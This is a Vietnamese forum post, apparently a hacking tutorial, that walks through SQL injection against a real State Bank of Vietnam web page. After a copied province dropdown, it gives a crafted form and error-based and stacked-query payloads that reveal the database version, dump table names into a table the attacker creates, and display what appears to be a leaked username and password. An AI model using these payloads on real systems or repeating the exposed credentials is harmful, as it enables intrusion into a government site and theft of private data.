<option value="ANGIANG">An Giang</option> <option value="BARIAVUNGTAU">Bà Rịa-Vũng Tàu</option> <option value="BINHDINH">Bình Định</option> <option value="BINHDUONG">Bình Dương</option> <option value="BINHPHUOC">Bình Phước</option> <option value="BINHTHUAN">Bình Thuận</option> <option value="BACLIEU">Bạc Liêu</option> <option value="BACCAN">Bắc Cạn</option> <option value="BACGIANG">Bắc Giang</option> <option value="BACNINH">Bắc Ninh</option> <option value="BENTRE">Bến Tre</option> <option value="CAMAU">Cà Mau</option> <option value="CAOBANG">Cao Bằng</option> <option value="GIALAI">Gia Lai</option> <option value="HAGIANG">Hà Giang</option> <option value="HANOI">Hà Nội</option> <option value="HANAM">Hà Nam</option> <option value="HATAY">Hà Tây</option> <option value="HATINH">Hà Tĩnh</option> <option value="HAIDUONG">Hải Dương</option> <option value="HAIPHONG">Hải Phòng</option> <option value="HAUGIANG">Hậu Giang</option> <option value="HUNGYEN">Hưng Yên</option> <option value="HOABINH">Hoà Bình</option> <option value="KHANHHOA">Khánh Hoà</option> <option value="KIENGIANG">Kiên Giang</option> <option value="KONTUM">Kon Tum</option> <option value="LAOCAI">Lào Cai</option> <option value="LAMDONG">Lâm Đồng</option> <option value="LANGSON">Lạng Sơn</option> <option value="LAICHAU">Lai Châu</option> <option value="LONGAN">Long An</option> <option value="NAMDINH">Nam Định</option> <option value="NGHEAN">Nghệ An</option> <option value="NINHBINH">Ninh Bình</option> <option value="NINHTHUAN">Ninh Thuận</option> <option value="PHUTHO">Phú Thọ</option> <option value="PHUYEN">Phú Yên</option> <option value="QUANGBINH">Quảng Bình</option> <option value="QUANGNAM">Quảng Nam</option> <option value="QUANGNGAI">Quảng Ngãi</option> <option value="QUANGNINH">Quảng Ninh</option> <option value="QUANGTRI">Quảng Trị</option> <option value="SOCTRANG">Sóc Trăng</option> <option value="SONLA">Sơn La</option> <option value="TAYNINH">Tây Ninh</option> <option value="THAIBINH">Thái Bình</option> <option value="THAINGUYEN">Thái Nguyên</option> <option value="THUATHIENHUE">Thừa Thiên Huế</option> <option value="THANHHOA">Thanh Hoá</option> <option value="TIENGIANG">Tiền Giang</option> <option value="TPHCM">TP Hồ Chí Minh</option> <option value="TPHUE">TP Huế</option> <option value="TRAVINH">Trà Vinh</option> <option selected value="TW">Trung Ương</option> <option value="TUYENQUANG">Tuyên Quang</option> <option value="VINHLONG">Vĩnh Long</option> <option value="VINHPHUC">Vĩnh Phúc</option> <option value="YENBAI">Yên Bái</option> </select></p> </form> oài ! thấy có cả daklak trong đó ( quê nhà mà hê hê ) thôi thì thữ coppy về và edit 1 xí xem sao : Code: <form name="Tim" method="post" action="http://www.sbv.gov.vn/home/hethongTCTDHT.asp" autocomplete="on"> <input type="text" size="100" name="lstTinh"> <input name="submit" type="submit" value="submit"> </form> langtu save lại thành file test.html và mở ra type dô cái input vài dòng thữ xem sao : Code: ' or 1=(@@version) và submit óe nó hiện ra cái gì đây :eek: : Trích: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 1) ' to a column of data type int. /home/hethongTCTDHT.asp, line 172 hề hề ! Sql inject cực nặng rồi nhé ! back lại test.html lt type vào : Trích: '; begin declare @temp varchar(8000) set @temp='' select @temp=@temp+table_name+'/' from information_schema.tables select @temp as id into langtu end Đoạn query trên có nghĩa là gì ?? declare @temp varchar(8000) là khai báo cho @temp rỗng và varchar(8000) ( cái này giống như kiểu khai báo biến trong các ngôn ngữ lập trình khác í mà ) tiếp theo là : set @temp='' select @temp=@temp+table_name+'/' from information_schema.tables cái này là đặt điều kiện cho @temp seclect ra table và tiếp tục cộng thêm 1 table tiếp theo ngăn cách bằng " / " ! select @temp as id into langtu end chọn @temp ờ cột id và trong table langtu ! Chắc phần nào hiểu rồi chứ hí hí ! Ok ! sau khi submit query trên ta sẽ được trả về http://www.sbv.gov.vn/home/hethongTCTDHT.asp và ko bị báo lỗi gì cả thì ta đã thành công ! Tiếp theo langtu sẽ select ra tất cả các table trong user data "dthai" mà sbv đang sữ dụng : Code: ' or 1=(select id from langtu) được : Trích: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'levietcuong :lvc123 /' to a column of data type int. /home/hethongTCTDHT.asp, line 172